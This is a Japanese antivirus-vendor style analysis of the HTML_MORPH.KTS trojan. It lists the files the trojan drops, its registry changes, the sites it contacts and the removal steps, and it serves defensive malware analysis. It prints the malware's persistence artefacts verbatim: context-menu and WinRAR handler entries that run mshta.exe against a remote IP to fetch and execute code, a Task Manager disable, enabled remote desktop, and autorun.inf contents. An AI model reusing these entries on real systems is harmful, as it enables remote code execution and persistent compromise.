HTML_MORPH.KTS
Windows 2000, Windows XP, Windows Server 2003

マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
感染報告の有無 :
はい
概要
マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。 マルウェアは、リムーバブルドライブを介してコンピュータに侵入します。
マルウェアは、ユーザが感染コンピュータ上のドライブへアクセスすると自身のコピーが自動実行するように、"AUTORUN.INF" を作成します。
詳細
侵入方法
マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。
マルウェアは、リムーバブルドライブを介してコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- {Drive}\autorun.inf
- {Drive}\Windows Live Messenger.lnk
- %User Profile%\msn\d.tpl
- %User Profile%\msn\d.reg
- %User Profile%\msn\a.txt
- %User Profile%\msn\mails.hta
- %Documents and Settings%\All Users\Start Menu\Programs\Windows Live Messenger.lnk
- %User Profile%\Start Menu\Windows Live Messenger.lnk
- %User Profile%\Start Menu\Programs\Windows Live Messenger.lnk
- %User Profile%\Start Menu\Programs\Startup\Windows Live Messenger.lnk
- %User Profile%\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk
- %User Profile%\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk
- %User Profile%\Desktop\Windows Live Messenger.lnk
- %User Profile%\Recent\Windows Live Messenger.lnk
(註:%User Profile% フォルダは、Windows 98 および MEの場合、"C:\Windows\Profiles\<ユーザ名>"、Windows NTでは、"C:\WINNT\Profiles\<ユーザ名>"、Windows 2000, XP, Server 2003の場合は、"C:\Documents and Settings\<ユーザ名>" です。)
マルウェアは、以下のフォルダを作成します。
- %User Profile%\msn
(註:%User Profile% フォルダは、Windows 98 および MEの場合、"C:\Windows\Profiles\<ユーザ名>"、Windows NTでは、"C:\WINNT\Profiles\<ユーザ名>"、Windows 2000, XP, Server 2003の場合は、"C:\Documents and Settings\<ユーザ名>" です。)
マルウェアは、感染コンピュータ上のメモリに以下のプロセスを確認すると、自身を終了します。
- avgnt.exe
- avguard.exe
- avshadow.exe
- chrome.exe
- firefox.exe
- GoogleUpdate.exe
- msnmsgr.exe
- GoogleCrashHandler.exe
- m2010.exe
他のシステム変更
マルウェアは、インストールの過程で、以下のレジストリ値を追加します。
HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui
(Default) = "Abrir Carpeta"
HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui\Command
(Default) = "mshta.exe http://187.157.146.149:102/m2012/msnmsgr.tpl"
HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui
(Default) = "Abrir Unidad de Disco"
HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui\Command
(Default) = "mshta.exe http://187.157.146.149:102/m2012/msnmsgr.tpl"
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Desktop\General
WallpaperSource = "%User Profile%\msn\M0rPheU$.jpg"
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Window Title = "::M0rPheU$:: v2.1"
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = "1"
マルウェアは、インストールの過程で以下のレジストリキーまたはレジストリ値を変更します。
HKEY_CLASSES_ROOT\WinRAR\shell\
open\command
(Default) = ""%System%\mshta.exe" "http://187.157.146.149:102/m2012/nfiles/exec.php?t=1318576022077;p=WinRar;f=%1""
(註:変更前の上記レジストリ値は、「""%Program Files%\WinRAR\WinRAR.exe" "%1""」となります。)
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Start Page = "http://printbazaar.co.in/images/live.htm"
(註:変更前の上記レジストリ値は、「"{User Defined}"」となります。)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = "0"
(註:変更前の上記レジストリ値は、「"1"」となります。)
感染活動
マルウェアは、ユーザが感染コンピュータ上のドライブへアクセスすると自身のコピーが自動実行するように、"AUTORUN.INF" を作成します。
上記INFファイルには、以下の文字列が含まれています。
[autorun]
open="inf.exe"
icon="C:\WINDOWS\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=1
その他
マルウェアは、以下の不正なWebサイトにアクセスします。
- http://{BLOCKED}r.es/includes/m0rpheus.php?1318576022077
- http://www.{BLOCKED}sescorts.com/images/DoS.htm?img=http%3A//mercacel.com/sms/index.php
- http://www.{BLOCKED}sescorts.com/images/DoS.htm?img=http%3A//{BLOCKED}el.com/2011/Connections/connMercacel.php
- http://www. {BLOCKED}escorts.com/images/DoS.htm?url=http%3A//{BLOCKED}el.com/secure/index.php
- http://{BLOCKED}b.es/images/msn.js?1318576022077
- http://{BLOCKED}b.es/images/msn.jpg
- http://{BLOCKED}b.es/images/iniciando.jpg
対応方法
手順 1
Windows XP および Windows Server 2003 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
Windowsをセーフモードで再起動します。
手順 3
このレジストリ値を削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui
- (Default) = Abrir Carpeta
- (Default) = Abrir Carpeta
- In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command
- (Default) = mshta.exe http://{BLOCKED}.{BLOCKED}.146.149:102/m2012/msnmsgr.tpl
- (Default) = mshta.exe http://{BLOCKED}.{BLOCKED}.146.149:102/m2012/msnmsgr.tpl
- In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui
- (Default) = Abrir Unidad de Disco
- (Default) = Abrir Unidad de Disco
- In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui\Command
- (Default) = mshta.exe http://{BLOCKED}.{BLOCKED}.146.149:102/m2012/msnmsgr.tpl
- (Default) = mshta.exe http://{BLOCKED}.{BLOCKED}.146.149:102/m2012/msnmsgr.tpl
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General
- WallpaperSource = Ͽer ProfileϿmsn\M0rPheU$.jpg
- WallpaperSource = Ͽer ProfileϿmsn\M0rPheU$.jpg
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
- Window Title = ::M0rPheU$:: v2.1
- Window Title = ::M0rPheU$:: v2.1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableTaskMgr = 1
- DisableTaskMgr = 1
手順 4
変更されたレジストリ値を修正します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_CLASSES_ROOT\WinRAR\shell\open\command
- From: (Default) = ϿstemϿmshta.exe http://{BLOCKED}.{BLOCKED}.146.149:102/m2012/nfiles/exec.php?t=1318576022077;p=WinRar;f=?
To: (Default) = Ͽogram FilesϿWinRAR\WinRAR.exe ?
- From: (Default) = ϿstemϿmshta.exe http://{BLOCKED}.{BLOCKED}.146.149:102/m2012/nfiles/exec.php?t=1318576022077;p=WinRar;f=?
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
- From: Start Page = http://{BLOCKED}azaar.co.in/images/live.htm
To: Start Page = {User Defined}
- From: Start Page = http://{BLOCKED}azaar.co.in/images/live.htm
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
- From: fDenyTSConnections = 0
To: fDenyTSConnections = 1
- From: fDenyTSConnections = 0
手順 5
以下のフォルダを検索し削除します。
手順 6
以下のファイルを検索し削除します。
C:\Windows Live Messenger.lnk
%Documents and Settings%\All Users\Start Menu\Programs\Windows Live Messenger.lnk
%User Profile%\Start Menu\Windows Live Messenger.lnk
%User Profile%\Start Menu\Programs\Windows Live Messenger.lnk
%User Profile%\Start Menu\Programs\Startup\Windows Live Messenger.lnk
%User Profile%\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk
%User Profile%\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk
%User Profile%\Desktop\Windows Live Messenger.lnk
%User Profile%\Recent\Windows Live Messenger.lnk
手順 7
「HTML_MORPH.KTS」が作成した AUTORUN.INF を検索し削除します。このファイルには、以下の文字列が含まれています。
open="inf.exe"
icon="C:\WINDOWS\system32\SHELL32.dll,8"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command="inf.exe"
shell\open\default=1
手順 8
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「HTML_MORPH.KTS」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください